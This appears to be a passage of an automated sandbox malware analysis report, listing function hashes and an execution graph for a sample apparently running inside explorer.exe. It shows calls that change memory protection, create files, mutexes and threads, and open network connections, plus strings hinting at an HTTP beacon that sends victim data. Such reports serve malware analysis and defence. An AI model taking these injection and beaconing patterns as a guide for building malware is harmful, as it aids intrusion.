                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                  • Instruction ID: 11a65002e6c21a140d3b6d251918a337636b2b72be95cee96b8e8998cc406a56
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                  • Instruction Fuzzy Hash: ED918F71E0021A9AEB2ADF6DCC816BFBBA5AF44320F14451EE995A73C1E730AD41CB51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                  • Opcode ID: fef239520868334ec204fd123b0c31dbd47d10efe748d86c9c508b3daa6b8dcd
                                                                                                                                                                  • Instruction ID: 668c85a83951a533f68ebc6fbff67370cfc4c2b795c9c82536e69c970eac73a5
                                                                                                                                                                  • Opcode Fuzzy Hash: fef239520868334ec204fd123b0c31dbd47d10efe748d86c9c508b3daa6b8dcd
                                                                                                                                                                  • Instruction Fuzzy Hash: F8810B72D006799BDB358F94CC55BEEBAB8BB48714F0041DAEA19B7240D7705E85CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 001B768D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                  • String ID: pow
                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                  • Opcode ID: f668f79c6b685a753630803679e9e46d0d5eedc6d4f341468a1bb8a5b3c18c0c
                                                                                                                                                                  • Instruction ID: 10ad830b254699740e1bffb8d76a5a4a8e745c388e7cefb8e0387406f1e14244
                                                                                                                                                                  • Opcode Fuzzy Hash: f668f79c6b685a753630803679e9e46d0d5eedc6d4f341468a1bb8a5b3c18c0c
                                                                                                                                                                  • Instruction Fuzzy Hash: DC519C61A1D602D6DB177B58C901BFA7BE0EBA4B40F304D6CE096812E9EF35CCD19A46
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:2.3%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:4.7%
                                                                                                                                                                  Total number of Nodes:444
                                                                                                                                                                  Total number of Limit Nodes:15
                                                                                                                                                                  execution_graph 13770 10b482f4 13771 10b48349 13770->13771 13772 10b4849f 13771->13772 13774 10b448f2 NtProtectVirtualMemory 13771->13774 13773 10b448f2 NtProtectVirtualMemory 13772->13773 13777 10b484c3 13772->13777 13773->13777 13775 10b48480 13774->13775 13776 10b448f2 NtProtectVirtualMemory 13775->13776 13776->13772 13778 10b448f2 NtProtectVirtualMemory 13777->13778 13779 10b48597 13777->13779 13778->13779 13780 10b448f2 NtProtectVirtualMemory 13779->13780 13781 10b485bf 13779->13781 13780->13781 13784 10b448f2 NtProtectVirtualMemory 13781->13784 13785 10b486b9 13781->13785 13782 10b486e1 13783 10b4b382 ObtainUserAgentString 13782->13783 13786 10b486e9 13783->13786 13784->13785 13785->13782 13787 10b448f2 NtProtectVirtualMemory 13785->13787 13787->13782 13922 10b519f1 13923 10b519f7 13922->13923 13926 10b46852 13923->13926 13925 10b51a0f 13927 10b468e4 13926->13927 13928 10b46865 13926->13928 13927->13925 13928->13927 13930 10b46887 13928->13930 13932 10b4687e 13928->13932 13929 10b4c36f 13929->13925 13930->13927 13931 10b4a662 6 API calls 13930->13931 13931->13927 13932->13929 13933 10b4c0c2 6 API calls 13932->13933 13933->13929 13788 10b440f1 13789 10b441d3 13788->13789 13790 10b44109 13788->13790 13791 10b44012 6 API calls 13790->13791 13792 10b44113 13791->13792 13792->13789 13793 10b4ff82 6 API calls 13792->13793 13793->13789 13934 10b455f1 13935 10b45606 13934->13935 13936 10b4560e 13934->13936 13937 10b4a662 6 API calls 13935->13937 13937->13936 13491 10b4f232 13492 10b4f25c 13491->13492 13494 10b4f334 13491->13494 13493 10b4f410 NtCreateFile 13492->13493 13492->13494 13493->13494 13897 10b519b3 13898 10b519bd 13897->13898 13901 10b466d2 13898->13901 13900 10b519e0 13902 10b46704 13901->13902 13903 10b466f7 13901->13903 13905 10b4672d 13902->13905 13907 10b466ff 13902->13907 13908 10b46737 13902->13908 13904 10b440f2 6 API calls 13903->13904 13904->13907 13910 10b4c2c2 13905->13910 13907->13900 13908->13907 13909 10b4ff82 6 API calls 13908->13909 13909->13907 13911 10b4c2df 13910->13911 13912 10b4c2cb 13910->13912 13911->13907 13912->13911 13913 10b4c0c2 6 API calls 13912->13913 13913->13911 13750 10b4a8be 13752 10b4a8c3 13750->13752 13751 10b4a9a6 13752->13751 13753 10b4a995 ObtainUserAgentString 13752->13753 13753->13751 13914 10b47fbf 13915 10b48016 13914->13915 13918 10b448f2 NtProtectVirtualMemory 13915->13918 13919 10b480bb 13915->13919 13920 10b480f0 13915->13920 13916 10b480e8 13917 10b4b382 ObtainUserAgentString 13916->13917 13917->13920 13918->13919 13919->13916 13921 10b448f2 NtProtectVirtualMemory 13919->13921 13921->13916 13754 10b4c0b9 13755 10b4c0ed 13754->13755 13757 10b4c1f0 13754->13757 13756 10b4ff82 6 API calls 13755->13756 13755->13757 13756->13757 13842 10b4e83a 13843 10b4e841 13842->13843 13844 10b4ff82 6 API calls 13843->13844 13846 10b4e8c5 13844->13846 13845 10b4e906 13846->13845 13847 10b4f232 NtCreateFile 13846->13847 13847->13845 13949 10b4ff7a 13950 10b4ffb8 13949->13950 13951 10b4c5b2 socket 13950->13951 13952 10b50081 13950->13952 13960 10b50022 13950->13960 13951->13952 13953 10b50134 13952->13953 13955 10b50117 getaddrinfo 13952->13955 13952->13960 13954 10b4c732 connect 13953->13954 13959 10b501b2 13953->13959 13953->13960 13954->13959 13955->13953 13956 10b4c6b2 send 13958 10b50729 13956->13958 13957 10b507f4 setsockopt recv 13957->13960 13958->13957 13958->13960 13959->13956 13959->13960 13794 10b480fb 13796 10b48137 13794->13796 13795 10b482d5 13796->13795 13797 10b448f2 NtProtectVirtualMemory 13796->13797 13798 10b4828a 13797->13798 13799 10b448f2 NtProtectVirtualMemory 13798->13799 13802 10b482a9 13799->13802 13800 10b482cd 13801 10b4b382 ObtainUserAgentString 13800->13801 13801->13795 13802->13800 13803 10b448f2 NtProtectVirtualMemory 13802->13803 13803->13800 13804 10b4c2e4 13805 10b4c36f 13804->13805 13806 10b4c305 13804->13806 13806->13805 13807 10b4c0c2 6 API calls 13806->13807 13807->13805 13961 10b46b66 13963 10b46b6a 13961->13963 13962 10b46cce 13963->13962 13964 10b46cb5 CreateMutexW 13963->13964 13964->13962 13808 10b49ce2 13810 10b49dd9 13808->13810 13809 10b4a022 13810->13809 13814 10b49352 13810->13814 13812 10b49f0d 13812->13809 13823 10b49792 13812->13823 13816 10b4939e 13814->13816 13815 10b4958e 13815->13812 13816->13815 13817 10b494ec 13816->13817 13819 10b49595 13816->13819 13818 10b4f232 NtCreateFile 13817->13818 13821 10b494ff 13818->13821 13819->13815 13820 10b4f232 NtCreateFile 13819->13820 13820->13815 13821->13815 13822 10b4f232 NtCreateFile 13821->13822 13822->13815 13824 10b497e0 13823->13824 13825 10b4f232 NtCreateFile 13824->13825 13827 10b4990c 13825->13827 13826 10b49af3 13826->13812 13827->13826 13828 10b49352 NtCreateFile 13827->13828 13829 10b49602 NtCreateFile 13827->13829 13828->13827 13829->13827 13604 10b50bac 13605 10b50bb1 13604->13605 13638 10b50bb6 13605->13638 13639 10b46b72 13605->13639 13607 10b50c2c 13608 10b50c85 13607->13608 13609 10b50c54 13607->13609 13610 10b50c69 13607->13610 13607->13638 13611 10b4eab2 NtProtectVirtualMemory 13608->13611 13612 10b4eab2 NtProtectVirtualMemory 13609->13612 13613 10b50c80 13610->13613 13614 10b50c6e 13610->13614 13615 10b50c8d 13611->13615 13617 10b50c5c 13612->13617 13613->13608 13619 10b50c97 13613->13619 13618 10b4eab2 NtProtectVirtualMemory 13614->13618 13675 10b48102 13615->13675 13661 10b47ee2 13617->13661 13623 10b50c76 13618->13623 13620 10b50c9c 13619->13620 13621 10b50cbe 13619->13621 13643 10b4eab2 13620->13643 13625 10b50cc7 13621->13625 13626 10b50cd9 13621->13626 13621->13638 13667 10b47fc2 13623->13667 13628 10b4eab2 NtProtectVirtualMemory 13625->13628 13630 10b4eab2 NtProtectVirtualMemory 13626->13630 13626->13638 13629 10b50ccf 13628->13629 13685 10b482f2 13629->13685 13633 10b50ce5 13630->13633 13703 10b48712 13633->13703 13641 10b46b93 13639->13641 13640 10b46cce 13640->13607 13641->13640 13642 10b46cb5 CreateMutexW 13641->13642 13642->13640 13644 10b4eadf 13643->13644 13652 10b4eebc 13644->13652 13715 10b448f2 13644->13715 13646 10b4ee5c 13647 10b448f2 NtProtectVirtualMemory 13646->13647 13648 10b4ee7c 13647->13648 13649 10b448f2 NtProtectVirtualMemory 13648->13649 13650 10b4ee9c 13649->13650 13651 10b448f2 NtProtectVirtualMemory 13650->13651 13651->13652 13653 10b47de2 13652->13653 13655 10b47df0 13653->13655 13654 10b47ecd 13657 10b44412 13654->13657 13655->13654 13738 10b4b382 13655->13738 13659 10b44440 13657->13659 13658 10b44473 13658->13638 13659->13658 13660 10b4444d CreateThread 13659->13660 13660->13638 13663 10b47f06 13661->13663 13662 10b47fa4 13662->13638 13663->13662 13664 10b448f2 NtProtectVirtualMemory 13663->13664 13665 10b47f9c 13664->13665 13666 10b4b382 ObtainUserAgentString 13665->13666 13666->13662 13668 10b48016 13667->13668 13670 10b480bb 13668->13670 13672 10b448f2 NtProtectVirtualMemory 13668->13672 13673 10b480f0 13668->13673 13669 10b480e8 13671 10b4b382 ObtainUserAgentString 13669->13671 13670->13669 13674 10b448f2 NtProtectVirtualMemory 13670->13674 13671->13673 13672->13670 13673->13638 13674->13669 13676 10b48137 13675->13676 13677 10b482d5 13676->13677 13678 10b448f2 NtProtectVirtualMemory 13676->13678 13677->13638 13679 10b4828a 13678->13679 13680 10b448f2 NtProtectVirtualMemory 13679->13680 13683 10b482a9 13680->13683 13681 10b482cd 13682 10b4b382 ObtainUserAgentString 13681->13682 13682->13677 13683->13681 13684 10b448f2 NtProtectVirtualMemory 13683->13684 13684->13681 13688 10b48349 13685->13688 13686 10b4849f 13687 10b448f2 NtProtectVirtualMemory 13686->13687 13692 10b484c3 13686->13692 13687->13692 13688->13686 13689 10b448f2 NtProtectVirtualMemory 13688->13689 13690 10b48480 13689->13690 13691 10b448f2 NtProtectVirtualMemory 13690->13691 13691->13686 13693 10b448f2 NtProtectVirtualMemory 13692->13693 13694 10b48597 13692->13694 13693->13694 13695 10b448f2 NtProtectVirtualMemory 13694->13695 13696 10b485bf 13694->13696 13695->13696 13699 10b448f2 NtProtectVirtualMemory 13696->13699 13700 10b486b9 13696->13700 13697 10b486e1 13698 10b4b382 ObtainUserAgentString 13697->13698 13701 10b486e9 13698->13701 13699->13700 13700->13697 13702 10b448f2 NtProtectVirtualMemory 13700->13702 13701->13638 13702->13697 13704 10b48767 13703->13704 13705 10b448f2 NtProtectVirtualMemory 13704->13705 13711 10b48903 13704->13711 13706 10b488e3 13705->13706 13707 10b448f2 NtProtectVirtualMemory 13706->13707 13707->13711 13708 10b48992 13709 10b489b7 13708->13709 13714 10b448f2 NtProtectVirtualMemory 13708->13714 13710 10b4b382 ObtainUserAgentString 13709->13710 13713 10b489bf 13710->13713 13711->13708 13712 10b448f2 NtProtectVirtualMemory 13711->13712 13712->13708 13713->13638 13714->13709 13716 10b44987 13715->13716 13720 10b449b2 13716->13720 13730 10b45622 13716->13730 13718 10b44c0c 13718->13646 13719 10b44ba2 13721 10b50e12 NtProtectVirtualMemory 13719->13721 13720->13718 13720->13719 13722 10b44ac5 13720->13722 13729 10b44b5b 13721->13729 13734 10b50e12 13722->13734 13724 10b50e12 NtProtectVirtualMemory 13724->13718 13725 10b44ae3 13725->13718 13726 10b44b3d 13725->13726 13727 10b50e12 NtProtectVirtualMemory 13725->13727 13728 10b50e12 NtProtectVirtualMemory 13726->13728 13727->13726 13728->13729 13729->13718 13729->13724 13732 10b4567a 13730->13732 13731 10b4567e 13731->13720 13732->13731 13733 10b50e12 NtProtectVirtualMemory 13732->13733 13733->13732 13735 10b4f942 13734->13735 13736 10b50e45 NtProtectVirtualMemory 13735->13736 13737 10b50e70 13736->13737 13737->13725 13739 10b4b3c7 13738->13739 13742 10b4b232 13739->13742 13741 10b4b438 13741->13654 13743 10b4b25e 13742->13743 13746 10b4a8c2 13743->13746 13745 10b4b26b 13745->13741 13748 10b4a934 13746->13748 13747 10b4a9a6 13747->13745 13748->13747 13749 10b4a995 ObtainUserAgentString 13748->13749 13749->13747 13848 10b4542e 13849 10b4545b 13848->13849 13857 10b454c9 13848->13857 13850 10b4f232 NtCreateFile 13849->13850 13849->13857 13851 10b45496 13850->13851 13853 10b45082 NtCreateFile 13851->13853 13856 10b454c5 13851->13856 13852 10b4f232 NtCreateFile 13852->13857 13854 10b454b6 13853->13854 13855 10b44f52 NtCreateFile 13854->13855 13854->13856 13855->13856 13856->13852 13856->13857 13942 10b4c72e 13943 10b4c788 connect 13942->13943 13944 10b4c76a 13942->13944 13944->13943 13758 10b51aa9 13759 10b51aaf 13758->13759 13762 10b4c212 13759->13762 13761 10b51ac7 13763 10b4c237 13762->13763 13764 10b4c21b 13762->13764 13763->13761 13764->13763 13766 10b4c0c2 13764->13766 13767 10b4c1f0 13766->13767 13768 10b4c0cb 13766->13768 13767->13763 13768->13767 13769 10b4ff82 6 API calls 13768->13769 13769->13767 13858 10b4b22a 13859 10b4b25e 13858->13859 13860 10b4a8c2 ObtainUserAgentString 13859->13860 13861 10b4b26b 13860->13861 13830 10b49cd4 13832 10b49cd8 13830->13832 13831 10b4a022 13832->13831 13833 10b49352 NtCreateFile 13832->13833 13834 10b49f0d 13833->13834 13834->13831 13835 10b49792 NtCreateFile 13834->13835 13835->13834 13516 10b50e12 13520 10b4f942 13516->13520 13518 10b50e45 NtProtectVirtualMemory 13519 10b50e70 13518->13519 13521 10b4f967 13520->13521 13521->13518 13862 10b45613 13864 10b45620 13862->13864 13863 10b4567e 13864->13863 13865 10b50e12 NtProtectVirtualMemory 13864->13865 13865->13864 13522 10b442dd 13526 10b4431a 13522->13526 13523 10b443fa 13524 10b44328 SleepEx 13524->13524 13524->13526 13526->13523 13526->13524 13529 10b4ef12 13526->13529 13538 10b45432 13526->13538 13548 10b440f2 13526->13548 13531 10b4ef48 13529->13531 13530 10b4f134 13530->13526 13531->13530 13532 10b4f0e9 13531->13532 13536 10b4f232 NtCreateFile 13531->13536 13554 10b4ff82 13531->13554 13534 10b4f125 13532->13534 13566 10b4e842 13532->13566 13574 10b4e922 13534->13574 13536->13531 13539 10b4545b 13538->13539 13547 10b454c9 13538->13547 13540 10b4f232 NtCreateFile 13539->13540 13539->13547 13541 10b45496 13540->13541 13542 10b454c5 13541->13542 13586 10b45082 13541->13586 13543 10b4f232 NtCreateFile 13542->13543 13542->13547 13543->13547 13545 10b454b6 13545->13542 13595 10b44f52 13545->13595 13547->13526 13549 10b44109 13548->13549 13551 10b441d3 13548->13551 13600 10b44012 13549->13600 13551->13526 13552 10b44113 13552->13551 13553 10b4ff82 6 API calls 13552->13553 13553->13551 13555 10b4ffb8 13554->13555 13556 10b4c5b2 socket 13555->13556 13558 10b50081 13555->13558 13565 10b50022 13555->13565 13556->13558 13557 10b50134 13559 10b4c732 connect 13557->13559 13564 10b501b2 13557->13564 13557->13565 13558->13557 13560 10b50117 getaddrinfo 13558->13560 13558->13565 13559->13564 13560->13557 13561 10b4c6b2 send 13563 10b50729 13561->13563 13562 10b507f4 setsockopt recv 13562->13565 13563->13562 13563->13565 13564->13561 13564->13565 13565->13531 13567 10b4e86d 13566->13567 13582 10b4f232 13567->13582 13569 10b4e888 13570 10b4e906 13569->13570 13571 10b4ff82 6 API calls 13569->13571 13572 10b4e8c5 13569->13572 13570->13532 13571->13572 13572->13570 13573 10b4f232 NtCreateFile 13572->13573 13573->13570 13575 10b4e9c2 13574->13575 13576 10b4f232 NtCreateFile 13575->13576 13580 10b4e9d6 13576->13580 13577 10b4ea9f 13577->13530 13578 10b4ea5d 13578->13577 13579 10b4f232 NtCreateFile 13578->13579 13579->13577 13580->13577 13580->13578 13581 10b4ff82 6 API calls 13580->13581 13581->13578 13583 10b4f25c 13582->13583 13585 10b4f334 13582->13585 13584 10b4f410 NtCreateFile 13583->13584 13583->13585 13584->13585 13585->13569 13587 10b45420 13586->13587 13588 10b450aa 13586->13588 13587->13545 13588->13587 13589 10b4f232 NtCreateFile 13588->13589 13590 10b451f9 13589->13590 13591 10b4f232 NtCreateFile 13590->13591 13594 10b453df 13590->13594 13592 10b453c9 13591->13592 13593 10b4f232 NtCreateFile 13592->13593 13593->13594 13594->13545 13596 10b44f70 13595->13596 13597 10b44f84 13595->13597 13596->13542 13598 10b4f232 NtCreateFile 13597->13598 13599 10b45046 13598->13599 13599->13542 13602 10b44031 13600->13602 13601 10b440cd 13601->13552 13602->13601 13603 10b4ff82 6 API calls 13602->13603 13603->13601 13836 10b47edd 13838 10b47f06 13836->13838 13837 10b47fa4 13838->13837 13839 10b448f2 NtProtectVirtualMemory 13838->13839 13840 10b47f9c 13839->13840 13841 10b4b382 ObtainUserAgentString 13840->13841 13841->13837 13866 10b51a1f 13867 10b51a25 13866->13867 13870 10b455f2 13867->13870 13869 10b51a3d 13871 10b4560e 13870->13871 13872 10b455fb 13870->13872 13871->13869 13872->13871 13874 10b4a662 13872->13874 13875 10b4a7ba 13874->13875 13876 10b4a66b 13874->13876 13875->13871 13876->13875 13877 10b440f2 6 API calls 13876->13877 13879 10b4a6ee 13877->13879 13878 10b4a750 13878->13875 13881 10b4a83f 13878->13881 13883 10b4a791 13878->13883 13879->13878 13880 10b4ff82 6 API calls 13879->13880 13880->13878 13881->13875 13882 10b4ff82 6 API calls 13881->13882 13882->13875 13883->13875 13884 10b4ff82 6 API calls 13883->13884 13884->13875 13938 10b47dd9 13939 10b47df0 13938->13939 13940 10b4b382 ObtainUserAgentString 13939->13940 13941 10b47ecd 13939->13941 13940->13941 13495 10b4ff82 13496 10b4ffb8 13495->13496 13499 10b50081 13496->13499 13506 10b50022 13496->13506 13507 10b4c5b2 13496->13507 13498 10b50134 13505 10b501b2 13498->13505 13498->13506 13510 10b4c732 13498->13510 13499->13498 13501 10b50117 getaddrinfo 13499->13501 13499->13506 13501->13498 13503 10b507f4 setsockopt recv 13503->13506 13504 10b50729 13504->13503 13504->13506 13505->13506 13513 10b4c6b2 13505->13513 13508 10b4c5ec 13507->13508 13509 10b4c60a socket 13507->13509 13508->13509 13509->13499 13511 10b4c788 connect 13510->13511 13512 10b4c76a 13510->13512 13511->13505 13512->13511 13514 10b4c705 send 13513->13514 13515 10b4c6e7 13513->13515 13514->13504 13515->13514 13889 10b51a4d 13890 10b51a53 13889->13890 13893 10b45782 13890->13893 13892 10b51a6b 13894 10b4578f 13893->13894 13895 10b457ad 13894->13895 13896 10b4a662 6 API calls 13894->13896 13895->13892 13896->13895 13965 10b4914a 13966 10b49153 13965->13966 13971 10b49174 13965->13971 13967 10b4b382 ObtainUserAgentString 13966->13967 13969 10b4916c 13967->13969 13968 10b491e7 13970 10b440f2 6 API calls 13969->13970 13970->13971 13971->13968 13973 10b441f2 13971->13973 13974 10b4420f 13973->13974 13978 10b442c9 13973->13978 13975 10b4ef12 7 API calls 13974->13975 13976 10b44242 13974->13976 13975->13976 13977 10b44289 13976->13977 13979 10b45432 NtCreateFile 13976->13979 13977->13978 13980 10b440f2 6 API calls 13977->13980 13978->13971 13979->13977 13980->13978 13885 10b50e0a 13886 10b50e45 NtProtectVirtualMemory 13885->13886 13887 10b4f942 13885->13887 13888 10b50e70 13886->13888 13887->13886

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 0 10b4ff82-10b4ffb6 1 10b4ffd6-10b4ffd9 0->1 2 10b4ffb8-10b4ffbc 0->2 4 10b508fe-10b5090c 1->4 5 10b4ffdf-10b4ffed 1->5 2->1 3 10b4ffbe-10b4ffc2 2->3 3->1 6 10b4ffc4-10b4ffc8 3->6 7 10b508f6-10b508f7 5->7 8 10b4fff3-10b4fff7 5->8 6->1 9 10b4ffca-10b4ffce 6->9 7->4 10 10b4ffff-10b50000 8->10 11 10b4fff9-10b4fffd 8->11 9->1 12 10b4ffd0-10b4ffd4 9->12 13 10b5000a-10b50010 10->13 11->10 11->13 12->1 12->5 14 10b50012-10b50020 13->14 15 10b5003a-10b50060 13->15 14->15 18 10b50022-10b50026 14->18 16 10b50062-10b50066 15->16 17 10b50068-10b5007c call 10b4c5b2 15->17 16->17 19 10b500a8-10b500ab 16->19 22 10b50081-10b500a2 17->22 18->7 21 10b5002c-10b50035 18->21 23 10b50144-10b50150 19->23 24 10b500b1-10b500b8 19->24 21->7 22->19 26 10b508ee-10b508ef 22->26 25 10b50156-10b50165 23->25 23->26 27 10b500e2-10b500f5 24->27 28 10b500ba-10b500dc call 10b4f942 24->28 29 10b50167-10b50178 call 10b4c552 25->29 30 10b5017f-10b5018f 25->30 26->7 27->26 32 10b500fb-10b50101 27->32 28->27 29->30 34 10b501e5-10b5021b 30->34 35 10b50191-10b501ad call 10b4c732 30->35 32->26 37 10b50107-10b50109 32->37 40 10b5022d-10b50231 34->40 41 10b5021d-10b5022b 34->41 43 10b501b2-10b501da 35->43 37->26 42 10b5010f-10b50111 37->42 45 10b50247-10b5024b 40->45 46 10b50233-10b50245 40->46 44 10b5027f-10b50280 41->44 42->26 47 10b50117-10b50132 getaddrinfo 42->47 43->34 49 10b501dc-10b501e1 43->49 48 10b50283-10b502e0 call 10b50d62 call 10b4d482 call 10b4ce72 call 10b51002 44->48 50 10b50261-10b50265 45->50 51 10b5024d-10b5025f 45->51 46->44 47->23 52 10b50134-10b5013c 47->52 63 10b502f4-10b50354 call 10b50d92 48->63 64 10b502e2-10b502e6 48->64 49->34 53 10b50267-10b5026b 50->53 54 10b5026d-10b50279 50->54 51->44 52->23 53->48 53->54 54->44 69 10b5048c-10b504b8 call 10b50d62 call 10b51262 63->69 70 10b5035a-10b50396 call 10b50d62 call 10b51262 call 10b51002 63->70 64->63 66 10b502e8-10b502ef call 10b4d042 64->66 66->63 79 10b504d9-10b50590 call 10b51262 * 3 call 10b51002 * 2 call 10b4d482 69->79 80 10b504ba-10b504d5 69->80 85 10b50398-10b503b7 call 10b51262 call 10b51002 70->85 86 10b503bb-10b503e9 call 10b51262 * 2 70->86 111 10b50595-10b505b9 call 10b51262 79->111 80->79 85->86 100 10b50415-10b5041d 86->100 101 10b503eb-10b50410 call 10b51002 call 10b51262 86->101 105 10b50442-10b50448 100->105 106 10b5041f-10b50425 100->106 101->100 105->111 112 10b5044e-10b50456 105->112 109 10b50467-10b50487 call 10b51262 106->109 110 10b50427-10b5043d 106->110 109->111 110->111 121 10b505d1-10b506ad call 10b51262 * 7 call 10b51002 call 10b50d62 call 10b51002 call 10b4ce72 call 10b4d042 111->121 122 10b505bb-10b505cc call 10b51262 call 10b51002 111->122 112->111 116 10b5045c-10b5045d 112->116 116->109 133 10b506af-10b506b3 121->133 122->133 135 10b506b5-10b506fa call 10b4c382 call 10b4c7b2 133->135 136 10b506ff-10b5072d call 10b4c6b2 133->136 158 10b508e6-10b508e7 135->158 143 10b5075d-10b50761 136->143 144 10b5072f-10b50735 136->144 148 10b50767-10b5076b 143->148 149 10b5090d-10b50913 143->149 144->143 147 10b50737-10b5074c 144->147 147->143 152 10b5074e-10b50754 147->152 155 10b50771-10b50773 148->155 156 10b508aa-10b508df call 10b4c7b2 148->156 153 10b50779-10b50784 149->153 154 10b50919-10b50920 149->154 152->143 159 10b50756 152->159 160 10b50786-10b50793 153->160 161 10b50795-10b50796 153->161 154->160 155->153 155->156 156->158 158->26 159->143 160->161 164 10b5079c-10b507a0 160->164 161->164 167 10b507b1-10b507b2 164->167 168 10b507a2-10b507af 164->168 170 10b507b8-10b507c4 167->170 168->167 168->170 173 10b507f4-10b50861 setsockopt recv 170->173 174 10b507c6-10b507ef call 10b50d92 call 10b50d62 170->174 176 10b508a3-10b508a4 173->176 177 10b50863 173->177 174->173 176->156 177->176 181 10b50865-10b5086a 177->181 181->176 184 10b5086c-10b50872 181->184 184->176 186 10b50874-10b508a1 184->186 186->176 186->177
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                  • API String ID: 1564272048-1117930895
                                                                                                                                                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                  • Instruction ID: 3ef48cabcdb43f6417f7e0578c6441493f9ab86d2533eaffa616acd8e0c40ae0
                                                                                                                                                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B529134624A488FC759EF68C4957E9B7E1FB54300F504AAEE49FC7146EE30B94ACB81
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 299 10b4f232-10b4f256 300 10b4f25c-10b4f260 299->300 301 10b4f8bd-10b4f8cd 299->301 300->301 302 10b4f266-10b4f2a0 300->302 303 10b4f2a2-10b4f2a6 302->303 304 10b4f2bf 302->304 303->304 306 10b4f2a8-10b4f2ac 303->306 305 10b4f2c6 304->305 307 10b4f2cb-10b4f2cf 305->307 308 10b4f2b4-10b4f2b8 306->308 309 10b4f2ae-10b4f2b2 306->309 311 10b4f2d1-10b4f2f7 call 10b4f942 307->311 312 10b4f2f9-10b4f30b 307->312 308->307 310 10b4f2ba-10b4f2bd 308->310 309->305 310->307 311->312 316 10b4f378 311->316 312->316 317 10b4f30d-10b4f332 312->317 318 10b4f37a-10b4f3a0 316->318 319 10b4f334-10b4f33b 317->319 320 10b4f3a1-10b4f3a8 317->320 323 10b4f366-10b4f370 319->323 324 10b4f33d-10b4f360 call 10b4f942 319->324 321 10b4f3d5-10b4f3dc 320->321 322 10b4f3aa-10b4f3d3 call 10b4f942 320->322 327 10b4f410-10b4f458 NtCreateFile call 10b4f172 321->327 328 10b4f3de-10b4f40a call 10b4f942 321->328 322->316 322->321 323->316 325 10b4f372-10b4f373 323->325 324->323 325->316 335 10b4f45d-10b4f45f 327->335 328->316 328->327 335->316 336 10b4f465-10b4f46d 335->336 336->316 337 10b4f473-10b4f476 336->337 338 10b4f486-10b4f48d 337->338 339 10b4f478-10b4f481 337->339 340 10b4f4c2-10b4f4ec 338->340 341 10b4f48f-10b4f4b8 call 10b4f942 338->341 339->318 347 10b4f4f2-10b4f4f5 340->347 348 10b4f8ae-10b4f8b8 340->348 341->316 346 10b4f4be-10b4f4bf 341->346 346->340 349 10b4f604-10b4f611 347->349 350 10b4f4fb-10b4f4fe 347->350 348->316 349->318 352 10b4f500-10b4f507 350->352 